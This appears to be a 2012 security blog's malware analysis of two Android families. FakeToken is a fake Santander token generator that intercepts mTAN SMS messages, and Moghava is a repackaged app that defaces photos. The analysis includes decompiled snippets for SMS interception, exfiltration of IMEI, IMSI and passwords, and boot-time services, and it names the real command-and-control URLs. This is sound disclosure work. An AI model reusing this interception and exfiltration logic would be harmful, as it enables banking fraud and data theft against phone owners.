Month: March 2012

Intro: What is Android.FakeToken?

This new malware-family emerged some days ago within a spanish Spam-campain and spreads through email and SMS messages. This new Android malware tries to forward mTAN SMS messages to a remote user and thus has the typical man-in-the-middle functionality, we have already seen in malware families like Zeus and SpyEye, but it also can be controlled remotely and doesn’t need to infect the user’s PC.

Analysis of the Application and Its Structure

When installing the app it requests the following permissions:

• android.permission.READ_PHONE_STATE
• android.permission.ACCESS_NETWORK_STATE
• android.permission.SEND_SMS
• android.permission.RECEIVE_SMS
• android.permission.INTERNET
• android.permission.WRITE_EXTERNAL_STORAGE
• android.permission.INSTALL_PACKAGES
• android.permission.DELETE_PACKAGES
• android.permission.READ_CONTACTS
• android.permission.RECEIVE_BOOT_COMPLETED

After the application has been installed successfully, the icon of the app shows up in the dashboard and the application registers some receivers which will trigger when a specific system event occurs (for example: BOOT_COMPLETED, USER_PRESENT, PHONE_STATE or SMS_RECEIVED). When the user executes the app, it shows a WebView component that displays an html-page which looks like a Token-Generator and it appears to be from the targeted bank (in our case it should look like the Santander Consumer Bank):

localWebView.addJavascriptInterface(new WebApi(this), "android");
System.out.println("Build.VERSION.RELEASE: " + Build.VERSION.RELEASE);
if ((Build.VERSION.RELEASE.startsWith("2.3.1")) || (Build.VERSION.RELEASE.startsWith("2.3.3")))
      localWebView.loadUrl("file:///android_asset/html/index_bag.html");
....

To get the fake token (just a random number), the user must enter the first factor of authentication. As soon as this step is done, the application sends a SMS message to the author and starts a background service afterwards:

public void sendPass(String paramString)
  {
    try
    {
      if (!Settings.saved.sendInitSms)
      {
        Settings.saved.sendInitSms = true;
        String str = Settings.saved.smsPrefix + " INIT " + MainApplication.imei + " " + MainApplication.imsi + " " + paramString;
        MainService.sendSms(Settings.saved.number, str);
        MainApplication.settings.save(this.context);
      }
....

This background service is listening to commands from the remote server (e.g. update of configuration) and starts periodically. When the smartphone of the victim receives a SMS message, the broadcast will be aborted and the message will be forwarded to a given phone number or remote server.

abortBroadcast();
SmsMessage localSmsMessage = arrayOfSmsMessage[j];
String str1 = localSmsMessage.getOriginatingAddress();
String str2 = localSmsMessage.getMessageBody();
CatchResult localCatchResult = MainApplication.settings.isCatchMessage(str1, str2);
if (localCatchResult.result)
   MainService.start(paramContext, paramIntent, "catch", str1, str2, localCatchResult.key);
if ((MainApplication.settings.isNewServer(paramContext, str1, str2)) || (MainApplication.settings.isDeleteMessage(str1, str2)))

The application sends IMEI, IMSI, phone type, version, sid, phone number and the SMS body within a HTTP Post to one of the corresponding remote servers. These servers and all necessary information are stored in a xml configuration (/data/data/token.generator/files/settings):

   
   
   79021121067
   1.0
   santander
   
   
      http://icoolshop.ru/cp/server.php
      http://iconsshopbest.com/cp/server.php
   
   qe4faf23r4e2
   sid_1
   false
   1331934321409
   43200

This file can be updated remotely (via SMS and HTTP GET) if the phone number or server address of the malware author changes. The malware also has the ability to install further apk-files and sends the phone numbers of all entries in the address book of the victim to a remote server. The last step happens probably for further distribution of the malware.

Sample Information:

sha256:
f7c36355c706fc9dd8954c096825e0613807e0da4bd7f3de97de0aec0be23b79

md5:
4548973449f707a6359a9b321ef54d31

Mobile-Sandbox Report

Intro: What is Android.Moghava?

This new malware-family emerged some days ago in third-party Iranian Android-Markets. It is one of the very few samples out there that is not intended to make money. Instead, the app represents another sample from the side of politically-motivated hacking (hacktivism) which modifies images that are stored on the device.

Even if this malicious app doesn’t cause any financial loss to the user of the smartphone, all the pictures on the smartphone are compromised.

Unfortunately, the sample which was submitted to our mobile-sandbox is not signed, so we couldn’t run it in our emulator and the rest of this analysis is made by looking directly in the decompiled code of the application.

Analysis of the Application and Its Structure

When installing the app it is requests the following permissions:

• android.permission.WRITE_EXTERNAL_STORAGE
• android.permission.RECEIVE_BOOT_COMPLETED

The application consist of two packages:

• the benign part of the app: ir.sharif.iranianfoods
• and the malicious part: com.Moghava

As it is very obvious that this is another repackaged app, we concentrated our analysis on the second package which has two classes, we will look at in the next sections.

com.Moghava.kicker

This class is called when the smartphone receives a “boot completed” and calls the second class of the malicious package (see the code snippet below).

public void onReceive(Context paramContext, Intent paramIntent){
   if ("android.intent.action.BOOT_COMPLETED".equals(paramIntent.getAction())){
      paramContext.startService(new Intent(paramContext, stamper.class));
   }
}

com.Moghava.stamper

This class is responsible for the malicious action of the application. First it tries to receive a list with every picture of your phone. This action runs in the background in regular intervals.

File[] arrayOfFile = new File("/sdcard/DCIM/Camera/").listFiles(new FilenameFilter(){
   public boolean accept(File paramFile, String paramString){
      return paramString.endsWith(".jpg");
   }
...

The application is only checking the /sdcard/DCIM/Camera/ folder, so on newer smartphones like the Samsung Galaxy S2 it isn’t getting all of your photos. On these smartphones the photos are often stored in /sdcard/external_sd/DCIM/Camera/.

After the application has received the list with all pictures inside this directory, it tries to modify them by merging the picture with a picture of Ayatollah Khomeini. Since the app isn’t checking if the picture is already compromised it does this action over and over again till the storage becomes full.

localBitmap1 = BitmapFactory.decodeResource(stamper.this.getResources(), 2130837505);
localBitmap2 = BitmapFactory.decodeFile(localFile.getPath());
if (localBitmap2.getWidth() > localBitmap1.getWidth()){
   k = localBitmap2.getWidth();
   n = localBitmap2.getHeight();
   localBitmap3 = Bitmap.createBitmap(k, n, Bitmap.Config.ARGB_8888);
   Canvas localCanvas = new Canvas(localBitmap3);
   localCanvas.drawBitmap(localBitmap2, 0.0F, 0.0F, null);
   localCanvas.drawBitmap(localBitmap1, 100.0F, 300.0F, null);
}

Sample Information:

sha256:
94bb6ade1ef31c6c96b98c7d8fad1abbc794292730f4363ea3cd9204fc5c9dfd

md5:
ec86f084ea0e0d0a33d5f39df19bd7be

Mobile-Sandbox Report